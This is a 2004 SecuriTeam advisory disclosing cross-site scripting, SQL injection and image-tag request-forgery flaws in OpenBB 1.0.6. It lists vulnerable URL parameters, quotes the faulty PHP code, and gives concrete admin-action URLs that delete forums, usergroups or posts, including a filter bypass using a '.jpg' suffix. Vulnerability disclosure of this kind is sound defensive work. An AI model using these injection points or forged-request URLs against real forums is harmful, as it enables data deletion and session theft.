[UNIX] OpenBB Multiple Vulnerabilities (board.php, search.php, member.php, post.php, myhome.php, index.php)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/02/04

  • Next message: SecuriTeam: "[UNIX] paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)"
    To: list@securiteam.com
    Date: 2 May 2004 11:24:12 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      OpenBB Multiple Vulnerabilities (board.php, search.php, member.php,
    post.php, myhome.php, index.php)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.openbb.com> OpenBB is a fast, lightweight, powerful bulletin
    board written in PHP/MySQL. Main features include: full customization via
    styles templates, instant messaging, private messaging, categories, member
    ranks, poll based threads, moderation, BB codes, thread notifications,
    avatars, member lists, private forums and more."

    Several types of attacks are possible against OpenBB. The system contains
    bugs that can lead from simple cross-site scripting, SQL injections to
    arbitrary command execution.

    DETAILS

    Vulnerable Systems:
     * OpenBB version 1.0.6

    Cross-site Scripting
    OpenBB is prone to cross-site scripting vulnerabilities in multiple files.
    Code be injected and executed in the context of the user's browsers or
    used to harvest sensitive user information such as that which is stored
    inside cookies (a prime example is login credentials).

    Some vulnerable scripts are listed below:
    /member.php?action=login&redirect=[XSS]
    /myhome.php?action=newmsg&to=blah[XSS]
    /post.php?action=mail&TID=1[XSS]
    /index.php?redirect=[XSS]

    SQL Injection
    Some fields supplied by users are not properly sanitized, allowing an
    attacker to pass additional SQL commands to the backend database. A
    snippet of code from one of the vulnerable scripts (post.php) is presented
    below:
    // Check to make sure they are not posting to a category
    $query_type = new query($SQL, "SELECT type FROM ".$prefix."forum_display
    WHERE forumid = $FID");
    $query_type->getrow();
    $ftype = $query_type->field('type');

    The $FID parameter is passed directly to the SQL query without being
    sanitized or filtered at all. Such an issue is present in more than one
    file and is not limited to only the 'post.php' file.

    Other vulnerable scripts are listed below (and their vulnerable
    parameter):
    /board.php?FID=1[SQL]
    /member.php?action=list&page=1&sortorder=[SQL]
    /member.php?action=list&page=1&sortorder=username&perpage=[SQL]
    /member.php?action=passwdsend&resetid=blah&id=2[SQL]
    /search.php?&sortby=dateline&sort=DESC&q=open&forums%5B[SQL]%5D
    /post.php?action=edit&page=1&PID=1[SQL]
    /post.php?action=post&FID=1[SQL]

    Arbitrary Command Execution
    A malicious user can execute arbitrary commands by simply sending a
    private message to the admin with the command embedded in the message or
    post a message with an embedded command in it (the command will be
    silently executed).

    Below are some examples of administrative commands that can be placed in
    an image tag or a malicious link:
    /cp_forums.php?do=remove&id=1
    /cp_usergroup.php?do=remove&UGID=1
    /cp_ipbans.php?action=do_delip&ipid=1

    Other types of administrative commands:
    /myhome.php?action=delmsg&box=inbox&id=all
    /post.php?action=edit&PID=1&send=1&delete=yes
    /moderator.php?action=announce&TID=1

    OpenBB actually tries to filter out such attacks by filtering out certain
    input. However, it does that in a flawed way.

    Below is a code snippet from the '/lib/codeparse.php' file that is
    responsible for the filtering:
    case 'img':
    if(!preg_match('#^(http|https)://(.*?)\.(gif|jpg|jpeg|png)$#', $inside) )
    $return = '[ invalid image ]';
    else
    $return = '<img src="' .str_replace('"', '', $inside). '" alt="User-Posted

    Image (tm)" border="0" />';
    break;

    All an attacker has to do in order to have the command executed
    successfully is make sure the URL within the image tag ends with an
    allowed extension. This is not very safe at all because we can make up a
    variable, add a good extension and the code is still ran.

    For example:
    /post.php?action=edit&PID=1&send=1&delete=yes&image=blah.jpg

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@gulftech.org>
    JeiAr.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)"

    Relevant Pages

    • [EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A remote command execution vulnerability has been discovered in the I-Mall ... sub intro { ... chomp $host; ...
      (Securiteam)
    • [UNIX] Lukemftpd (Tnftpd) Multiple Vulnerabilities May Lead To Remote Code Execution
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... structure tab to indicate if it's acceptable for a command to occur in OOB ... delivering of ABOR and STAT commands in OOB mode. ...
      (Securiteam)
    • [UNIX] Sudo Race Condition Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A race condition with the Sudo command pathname handling allows a local ... When a user runs a command via Sudo, the inode and device numbers of the ... listed in the sudoers file is stored in the variable safe_cmnd, ...
      (Securiteam)
    • [NEWS] payShield Library Bad Requests Verification
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... When a command is sent through the SPP library the library may query its ... Although an error message will be printed to the payShield log this error ... There is a work-around to this problem, but it is more intrusive than ...
      (Securiteam)
    • [VulnWatch] perlbot 1.9.2 - Remote Command Execution
      ... this is different from madhater perlbot 1.0 beta - Remote Command ... perlbot 1.9.2 - Remote Command Execution ... Due to poor input filtering and a call to the shell it is possible to ...
      (VulnWatch)